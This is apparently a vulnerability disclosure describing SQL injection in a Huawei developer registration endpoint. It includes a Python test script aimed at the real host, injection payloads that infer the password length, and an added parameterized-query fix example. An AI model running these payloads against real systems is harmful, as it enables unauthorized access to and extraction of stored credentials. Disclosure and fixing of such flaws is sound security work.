Author: Matrix
Brief description:
Huawei smart cloud has a SQL injection vulnerability that could theoretically be used to modify back-end data.
Detailed description:
http://developer.huaweidevice.com/dev_creg.php
The POST data for user name verification is not strictly validated. Submission address: /dev_creg/preg.php?ckuser=1
Refer to the following test script:
import httplib, urllib
import sys

# Python 2 script: posts the first command-line argument as the username field.
if len(sys.argv) < 2:
    sys.exit(0)

headers = {
    "Accept": "*/*",
    "Accept-Language": "zh-CN,zh;q=0.8",
    "Referer": "http://developer.huaweidevice.com/dev_creg.php",
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
    "Content-Type": "application/x-www-form-urlencoded",
    "X-Requested-With": "XMLHttpRequest",
}
params = urllib.urlencode({
    "username": sys.argv[1],
})
conn = httplib.HTTPConnection('developer.huaweidevice.com')
conn.request("POST", "/dev_creg/preg.php?ckuser=1", params, headers)
response = conn.getresponse()
data = response.read()
# Print the response body, falling back to raw bytes if it is not UTF-8.
try:
    print data.decode("UTF-8")
except Exception:
    print data
Proof of vulnerability:
test.py ".'"
Returned error message: <B>SQL</B>: select uid from [Table]members where username='.a'<br/>
D:\> test.py ".a' or '1'='1"
{"code":0,"msg":"The nickname is invalid or already exists"}
The back end applies a simple filter, and spaces are truncated.
D:\> test.py ".a' or (length(password)=32) or '2'='1"
{"code":0,"msg":"The nickname is invalid or already exists"}
D:\> test.py ".a' or (length(password)=31) or '2'='1"
{"code":1,"msg":"congratulations, this name can be registered!"}
D:\> test.py ".a' or (length(password)=33) or '2'='1"
{"code":1,"msg":"congratulations, this name can be registered!"}
Only the length(password)=32 condition returns the "already exists" response, so the injected expression is being evaluated by the database and the stored password value is 32 characters long.
Solution:
SQL filtering is recommended.
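The fix in practice, as an added example that is not code from the original report or from the affected site: the user name check built by string concatenation next to the same check with a bound parameter, run against the inputs from the transcript above. It assumes an in-memory SQLite database standing in for the site's database; the function names, the sample rows and the -1 error code are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample data: one member whose password hash is 32 characters.
    db = sqlite3.connect(":memory:")
    db.execute("create table members (uid integer primary key, "
               "username text, password text)")
    db.execute("insert into members (username, password) values (?, ?)",
               ("alice", "0" * 32))
    return db

def taken_concatenated(db, username):
    # Vulnerable shape from the error message: input pasted into the SQL text.
    sql = "select uid from members where username='" + username + "'"
    return db.execute(sql).fetchone() is not None

def taken_parameterized(db, username):
    # Hardened shape: input is bound as data and cannot alter the query.
    sql = "select uid from members where username = ?"
    return db.execute(sql, (username,)).fetchone() is not None

def check(db, taken, username):
    # Response codes as on the page: 0 = name exists, 1 = name can be registered.
    try:
        return 0 if taken(db, username) else 1
    except sqlite3.Error:
        return -1  # assumed code for a query error; not a value from the page

# Inputs from the page's transcript, plus two ordinary names (constructed).
INPUTS = [
    "alice",
    "bob",
    ".'",
    ".a' or '1'='1",
    ".a' or (length(password)=32) or '2'='1",
    ".a' or (length(password)=31) or '2'='1",
]

def compare():
    db = make_db()
    return [(u, check(db, taken_concatenated, u), check(db, taken_parameterized, u))
            for u in INPUTS]

if __name__ == "__main__":
    for username, weak, fixed in compare():
        print("%-45r concatenated=%2d parameterized=%2d" % (username, weak, fixed))
```

With the bound parameter every injected string is treated as an unregistered name; character filtering on user names can still be applied in front of it, but the binding is what removes the injection.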